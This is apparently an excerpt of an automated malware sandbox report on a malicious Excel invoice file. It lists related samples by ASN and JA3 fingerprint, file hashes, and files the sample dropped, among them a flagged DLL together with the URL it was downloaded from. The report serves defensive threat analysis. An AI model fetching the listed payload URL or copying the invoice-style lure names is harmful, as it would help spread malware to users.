	https://email.utest.com/ls/click?upn=LMh8OQWOikhQ4E8y-2BrYnz-2BbDB2TElaf90yCHoFAn4M1bYurbyYcloHeQnYwY0vQ7VDotXE-2F1AU3v6KKQKAvhhYV0UBWlqtuRNZJVtvX80VxChFCc1lzvSHIOg2vQaiTyT0IDnohwmvAyk6q7Lw7aV2oNzPp1SRnlWHFXN0qSB1ZgfLjV0g7BwyUNgRacGzLQzxxo4OCEX0IynXTekIdGpsnVH8RdeHbQN5hmkvqmAfMoOPsGKIXFuD2XjXmSQNwHQ8tj_OFYFW3aawQjHnZ2oUsm9aGRmiVDxWOGUeXvmswsU9xvx6eL-2F-2Facl5TxDb-2FnQAE-2F9WO-2BX1bZLZ3dQ6WwuATmPzz3S8NpXbPAjepyz5kRHvZa0CDmTSp0IhGs72hXqIXDMOuT72gd5GYA2W6rPcohuTqV3rAs0ui6xQJlDhswQEvrgqzCELYcSf4yeLy0GlPUnnpdaGlBorHCk0eM6B-2FWcFUAXo2t3fTe0C5AFZKARfK8-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=pRtNAE4pBw306smbkBG7VfeIwBX2zq-2BxFGkc-2FYVg2kyteQhPgCyjFlF3g7Xm8OdsEJm4m-2Bb8v32fZo5G1S6IScPtZRx0O1qeslKL30HVUgu03CpTlmUlGG19oYXIdBdB3T-2BnneFUo-2FnuydTFtQrV-2FFD7ECFZ6-2BXjQduZf9kDgVI74LqkaeF5jfEKlvI9dNzmUWbncaLWs9jkPrQYRliwgvYISGRxPJ7a3gAUWZPRjDY-3DfCad_fQ8VNONEToroRqvq8M8IT71VVsbp-2FrVCPzMBywYUGjNEx5hFeS-2B3-2B0wfsC8rR2-2FcrAujDEHG74A-2FnVGsRRFxg-2FNYq0Ficj-2F6MNmWD3eD9hLtWuST0s8y4JgrbMq35uIiVx4-2FWXoquNFvepEkXYb-2BIIifvG1Hrrso0Hz938T8Kk2oqOiB-2BWIt73FfY6-2F7kAdcZlD9fseESOxt2IDwNJfsG-2BJ2dV9l2zjNB8qRR8WVLPs-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=fuaIpvnsuSQILWwzYiXi5qnEApdA08gndIGt9eDXEUzb2D9ZQis83XJjquyQ-2B9NU6N6PUmNiYKL2-2B9K-2B0Q-2FRuNZV2Rm6EE3tP6uveKZcpGa39fA3R6q6mtnf0YazerOr3Wym2I-2B4EKphohsG9TZrR10vb4sAorg3TlmbMLBvyRhlhPfnKFPOumxhPEnjlTpz4URurYF2wvhUTU5FbrZwbgaLDFhKWhDuDmKVQ4MiqOgEAGo1wQlNp439PzN1eKX8UvDM_oB8tJkdbn8-2B0HmsO8J4iQplzftnfE-2B8k0a9q1EntRKkJu1B-2FCVgO526eX33TRFpJwAzeZS5KAS0tKKzRRvWnodl78aEsHhSxo91ApNyL4MdpCkbZLJkdQb12aN6YOUgsp7GPBut2ZGkQb0VPeuTR9sLawADBZxxcvvOm5C44mioeJoHe0qFQpD7j-2FkTjaJgMi4jWdYXYz6hdODOLE13y3HyL2fGbEXG3mHtm20h7Ry8-3D	Get hash	malicious	Browse	104.18.10.39

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GD-EMEA-DC-SXB1DE	Inv0209966048-20210111075675.xls	Get hash	malicious	Browse	80.86.91.27
	xad05r9ba.dll	Get hash	malicious	Browse	80.86.91.27
	mcluc5u.dll	Get hash	malicious	Browse	80.86.91.27
	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse	80.86.91.27
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse	80.86.91.27
	HkNkyKl3uT.dll	Get hash	malicious	Browse	80.86.91.27
	ceepq536n.zip.dll	Get hash	malicious	Browse	80.86.91.27
	sample20210111-01.xlsm	Get hash	malicious	Browse	80.86.91.27
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	80.86.91.27
	hiytvys.dll	Get hash	malicious	Browse	80.86.91.27
	l7rgi3xyd.dll	Get hash	malicious	Browse	80.86.91.27
	ymuyks.dll	Get hash	malicious	Browse	80.86.91.27
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	80.86.91.27
	hy9x6wzip.dll	Get hash	malicious	Browse	80.86.91.27
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	80.86.91.27
	jufk0vrar.dll	Get hash	malicious	Browse	80.86.91.27
	s3CRQNulKZ.exe	Get hash	malicious	Browse	217.172.179.54
	DFR2154747.vbe	Get hash	malicious	Browse	85.25.93.233
	r8a97.exe	Get hash	malicious	Browse	62.75.168.106
	NKsplucdAu.exe	Get hash	malicious	Browse	217.172.179.54
TELEPOINTBG	spetsifikatsiya.xls	Get hash	malicious	Browse	79.124.76.20
	spetsifikatsiya.xls	Get hash	malicious	Browse	79.124.76.20
	document-1932597637.xls	Get hash	malicious	Browse	217.174.152.52
	document-1932597637.xls	Get hash	malicious	Browse	217.174.152.52
	document-1961450761.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909441643.xls	Get hash	malicious	Browse	217.174.152.52
	document-1961450761.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909441643.xls	Get hash	malicious	Browse	217.174.152.52
	document-1942925331.xls	Get hash	malicious	Browse	217.174.152.52
	document-1942925331.xls	Get hash	malicious	Browse	217.174.152.52
	document-1892683183.xls	Get hash	malicious	Browse	217.174.152.52
	document-1892683183.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909894964.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909894964.xls	Get hash	malicious	Browse	217.174.152.52
	document-1965918496.xls	Get hash	malicious	Browse	217.174.152.52
	document-1965918496.xls	Get hash	malicious	Browse	217.174.152.52
	document-1901557343.xls	Get hash	malicious	Browse	217.174.152.52
	document-1901557343.xls	Get hash	malicious	Browse	217.174.152.52
	document-1958527977.xls	Get hash	malicious	Browse	217.174.152.52
	document-1958527977.xls	Get hash	malicious	Browse	217.174.152.52
SENTIANL	Inv0209966048-20210111075675.xls	Get hash	malicious	Browse	5.100.228.233
	xad05r9ba.dll	Get hash	malicious	Browse	5.100.228.233
	mcluc5u.dll	Get hash	malicious	Browse	5.100.228.233
	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse	5.100.228.233
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse	5.100.228.233
	HkNkyKl3uT.dll	Get hash	malicious	Browse	5.100.228.233
	ceepq536n.zip.dll	Get hash	malicious	Browse	5.100.228.233
	sample20210111-01.xlsm	Get hash	malicious	Browse	5.100.228.233
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	5.100.228.233
	hiytvys.dll	Get hash	malicious	Browse	5.100.228.233
	l7rgi3xyd.dll	Get hash	malicious	Browse	5.100.228.233
	ymuyks.dll	Get hash	malicious	Browse	5.100.228.233
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	5.100.228.233
	hy9x6wzip.dll	Get hash	malicious	Browse	5.100.228.233
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	5.100.228.233
	jufk0vrar.dll	Get hash	malicious	Browse	5.100.228.233
	anthon.exe	Get hash	malicious	Browse	145.131.21.142
	baf6b9fcec491619b45c1dd7db56ad3d.exe	Get hash	malicious	Browse	91.216.141.46
	p8LV1eVFyO.exe	Get hash	malicious	Browse	91.216.141.46
	IQtvZjIdhN.exe	Get hash	malicious	Browse	91.216.141.46

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	Inv0209966048-20210111075675.xls	Get hash	malicious	Browse	217.174.149.3
	ACH PAYMENT REMlTTANCE.xlsx	Get hash	malicious	Browse	217.174.149.3
	FedEx 772584418730.doc	Get hash	malicious	Browse	217.174.149.3
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	217.174.149.3
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.18733.rtf	Get hash	malicious	Browse	217.174.149.3
	PURCHASE ORDER-34002174.doc	Get hash	malicious	Browse	217.174.149.3
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.5396.rtf	Get hash	malicious	Browse	217.174.149.3
	n#U00b0 761.doc	Get hash	malicious	Browse	217.174.149.3
	swift 0182021.xls	Get hash	malicious	Browse	217.174.149.3
	Curriculo Laura.xlsm	Get hash	malicious	Browse	217.174.149.3
	prints-eduardo-bolsonaro.docm	Get hash	malicious	Browse	217.174.149.3
	Curriculo Laura.xlsm	Get hash	malicious	Browse	217.174.149.3
	prints carlos bolsonaro.docm	Get hash	malicious	Browse	217.174.149.3
	prints carlos bolsonaro.docm	Get hash	malicious	Browse	217.174.149.3
	New PO.doc	Get hash	malicious	Browse	217.174.149.3
	Recibo de la transaccion.xls	Get hash	malicious	Browse	217.174.149.3
	Xeron_Scan2021002111002.doc	Get hash	malicious	Browse	217.174.149.3
	INFO.xls	Get hash	malicious	Browse	217.174.149.3
	SWIFT_075.dotm	Get hash	malicious	Browse	217.174.149.3
	Order-Detail-17534.doc	Get hash	malicious	Browse	217.174.149.3
eb88d0b3e1961a0562f006e5ce2a0b87	Inv0209966048-20210111075675.xls	Get hash	malicious	Browse	77.220.64.37
	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse	77.220.64.37
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse	77.220.64.37
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	77.220.64.37
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	77.220.64.37
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	77.220.64.37
	Document74269.xls	Get hash	malicious	Browse	77.220.64.37
	Document74269.xls	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xls	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1-Total New Invoices Monday Dec 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	SecuriteInfo.com.Heur.15645.xlsm	Get hash	malicious	Browse	77.220.64.37
	Statement_1857_of_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	Statement_9505_of_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	MSC printouts of outstanding as of 73221_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	Invoice.29002611.doc	Get hash	malicious	Browse	77.220.64.37

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\Temp\bjcbglsw.dll	Inv0209966048-20210111075675.xls	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rar	Inv0209966048-20210111075675.xls	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	7.367371959019618
Encrypted:	false
SSDEEP:	24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
MD5:	E4A68AC854AC5242460AFD72481B2A44
SHA1:	DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
SHA-256:	CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
SHA-512:	5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0...0..v........:......(d.....0....H........0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20...130801120000Z..380115120000Z0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20.."0....H.............0.........7.4.{k.h..Ju.F.!.....T......:..<z...k.-.^.$D.b.~..~.Tu ..P..c.l0.............7...CN.{,.../..:...%.k.`.`.O!I..g..a......2k..W.].......I.5-..Im.w..IK..U......#.LmE.....0..LU.'JW.\|...s...J...P.......!..........g(.s..=Fv...!4M..E..I.....3.).......B0@0...U.......0....0...U...........0...U......N"T ....n..........90....H.............`g(.o.Hc.1..g..}<.J...+.._sw2.9.gB.#.Eg5....a.4.. L....5.v..B..D...6t$Z.l..Y5..I....G=./.\... ._SF..h...0.>1.....>5.._..pPpGA.W.N......./.%.u...o..Aq...O. U...E..D..2...SF.,...".K..E....X..}R..YC....&.o....7}.....w_v.<..]V[..fn.57.2.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
SSDEEP:	24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.0892951054004123
Encrypted:	false
SSDEEP:	6:kKOLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:mLutWOxSW0zeYrsMlU/
MD5:	FE23BA5105EB158BC8E552EF75D10B1B
SHA1:	B7E4B32FCEA4D0B9AB6071C590831B5A457F6C1B
SHA-256:	70DA58207CD584902854310036CDB9A756E7E1ED4582C0CB72BF6F63EC54B75F
SHA-512:	AA2E433B5AA47F3CBC5C66E0429B3C0A95D07B72090A59BD19E26C1554FBB42E4AF4DD4ADF705F09A5FE8FCBB961941A6AFC32CA376591529C1872EAA18EEE70
Malicious:	false
Reputation:	low
Preview:	p...... ....j...P>C.....(....................................................... ............n...u..................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.G.l.o.b.a.l.R.o.o.t.G.2...c.r.t...".5.a.2.8.6.4.1.7.-.3.9.2."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.1170519944677504
Encrypted:	false
SSDEEP:	6:kKVQSwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:dQdkPlE99SNxAhUegeT2
MD5:	DC1DDCE028A6E4009ECC19B5D307C7A2
SHA1:	1C1827D553B039B897EC1F859B846BE5FC60ECC1
SHA-256:	36BE217EF1F7FB8E9B9E623F9FA4BE4BC35BB3115A31CBC20578B48E5C3154DA
SHA-512:	7323ADA578ED7ED97708CE770CC73B6FB9BB03998779B80A782F8ECB89DFA93A098ACFF608C1701E1853C093C68EF6DDAF261BA4805D664FA744D5384189D26F
Malicious:	false
Reputation:	low
Preview:	p...... ..........8.....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.0294634724686764
Encrypted:	false
SSDEEP:	3:kkFklUkfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kK9aliBAIdQZV7eAYLit
MD5:	B119074602F54E16628B91ECA8C7DF98
SHA1:	E0DD8529DD30F418C5D16DBECCCA703DB5E298BA
SHA-256:	621F88E559F9B4602388D2349D27A3E420D84B909B38A56254A5B45986190ED4
SHA-512:	D8F274623DE79B3AE675A6804CCD49163746B4BC9DF4D47BEABFE61EFC717696E319B8032C31E7A4CDC4B4701A4CAC96B0EB8977D3C2ADB1F7298AA7D9145D87
Malicious:	false
Reputation:	low
Preview:	p...... ....`..........(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rar Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	319488
Entropy (8bit):	7.125176562164236
Encrypted:	false
SSDEEP:	6144:5HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:RdO02Srnh0qEJC+Y218jdU
MD5:	597B02A17B8C012E25FA0A668004163B
SHA1:	424A6F131D5C765EFDB28E5CAAE5FE2834A82BB0
SHA-256:	E3F7EB34C3A1FD306C7788096CB666F3362BA5AA78710074B61DD03F829B8AFD
SHA-512:	C75D875F3ABE620779380E7AE0F4BBB59B0C823B40889084B51396CD166187CBD90F7FB4159969DF1C7C241930BAA93BD051BF2F8FFF9CB8402D00CFB60062D4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: Inv0209966048-20210111075675.xls, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	https://media-server.skyinternet.com.pk/hhsz1e0.rar
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:._...........!...2.z...b.......&.......@...............................@..........................................................\|....................0.......................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.6....p.......2..............@..@.data................4..............@....text4...R.......T...R.............. ..@.rsrc...\|........0..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F82396A.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1408
Entropy (8bit):	2.270567557934206
Encrypted:	false
SSDEEP:	12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
MD5:	40550DC2F9D56285FA529159B8F2C6A5
SHA1:	DD81D41D283D2881BEC77E00D773C7E8C0744DA3
SHA-256:	DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
SHA-512:	FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
Malicious:	false
Preview:	....l................................... EMF........).......................`...1........................\|..F...........GDIC........L0.U......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7D72663.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 363 x 234, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2653
Entropy (8bit):	7.818766151665501
Encrypted:	false
SSDEEP:	48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x
MD5:	30D3FFA1E30B519FD9B1B839CC65C7BE
SHA1:	1EB0F0E160FF7440223A7FE46F08B503F03D3AFB
SHA-256:	89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC
SHA-512:	88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50
Malicious:	false
Preview:	.PNG........IHDR...k.........S.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.........KIK..................IDATx...b.0.E-......`.Y..~f.$.h...,..H..CLg.x<.h..k..k..k..k..k..k..k........:....$F...........E.....t.c?.~...q?.....!F....)<#$.l.......`..f.......;.......D]M.~..s.....h.}`.&{..X2.6.....s.;3>..o....0zn...])..8..;..rA..6..Xn"R..a.Bw..M....tw..mE.w....>....].._v...z...H.y..8{)Z...gu.C~.3...>]o..>_.F/....._7nt...c...n..lu..g..@......I...=.........?.9...."..Rc..b..lf.f..l.....#4...Fw.A{...&N.Z.'..2.;.?.h.\|..eZf..`..`..`..`......O..m.>n.-fS.........R...q.....F..D.....w...e..x.H.?.C........;.o!.)....@G..y..EY...5.>...'.}..4(..Aj)d.Pk....7vG........,G..RZ.#F...K.<.....'j...^r.(......"......FHN.D4.j.y..wJ_...H2.....lN....?.V?...z.K.......M..F... ..t...053..:..0.~.S-.30..'...Q..et..=...5.q.Ko..Y#...H.~...C..CLi.83..6_..B.DC..>?.]..fGo..X0}C.\|.@B..AJ.s.x...n..[.#WE....F.gv..i}..f}.....qG...G.O4....w6.x.L.J.......^._o:Za}..{.x.....F

C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_EXCEL.EXE_6f227b18f49da44a2d1889aa10939f535bdc_0965a757\Report.wer Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	data
Category:	dropped
Size (bytes):	17342
Entropy (8bit):	3.709621429417914
Encrypted:	false
SSDEEP:	96:204KBakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOBJ:2LJBKzFCEuhTlyZVaPJVaJa5GG
MD5:	5BDAEAEE4662B05799D7D65D0AB0D87E
SHA1:	66D091A1DA92DE816B61878ADE3A40DF07998DE0
SHA-256:	4BFB16E21FAC9F203FB580EA3EED2E3C766B6CA6EB6DE9DF499F5E30BFE53998
SHA-512:	4B59466997CBB3745D9352732A17EC72357EF2134F7DA374A94DB28ACD1C74442658B4FAA07DEEF420C59CB11ED671055C13C080790734CF90774DBF737194CF
Malicious:	false
Preview:	V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.4.9.3.9.7.8.8.4.7.7.5.5.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.4.9.3.9.8.0.5.4.8.1.5.8.2.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.a.f.8.8.2.6.-.5.4.e.c.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.a.f.8.8.2.5.-.5.4.e.c.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.I.d.=.3.7.0.1.1.5.9.2.6.1.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.T.a.b.l.e.=.3.8.0.7.0.7.5.2.5.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .N.a.m.e.....S.i.g.[.0.]...V.a.l.u.e.=.E.X.C.E.L...E.X.E.....S.i.g.[.1.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .V.e.r.s.i.o.n.....S.i.g.[.1.]...V.a.l.u.e.=.1.4...0...7.0.1.5...1.0.0.0.....S.i.g.[.2.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .T.i.m.e.s.t.a.m.p.....S.i.g.[.2.]...V.a.l.u.e.=.5.1.c.c.a.7.c.d.....S.i.g.[.3.]...N.a.m.

C:\Users\user\AppData\Local\Temp\999872.cvr Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	1392
Entropy (8bit):	3.148340654858081
Encrypted:	false
SSDEEP:	24:+ll/pRCCcmvsqI8FfOdqOLQQl/axwCktXH4apWFvkhDKbeUP++E7foPRuC+fURKU:+ll/pvT6gcleOCiy+gZuDsAU
MD5:	62CF8759F67DB74A22B811F6004A7DB6
SHA1:	442DB0B8FA00FE4045CB19F5A8A71D5363F444A5
SHA-256:	97BAAE07733977E62B6D083A03EBFCADD88EB56761A075F754C64E2276403DEA
SHA-512:	9EA986064C7911F7F9766A83318FC2D6ED6DDF50970B4C80F884E69069491F7E26B604239A33AEC9DF5D63B2739B9239BD126C3EA7D2543A788D197CCABA1BA0
Malicious:	false
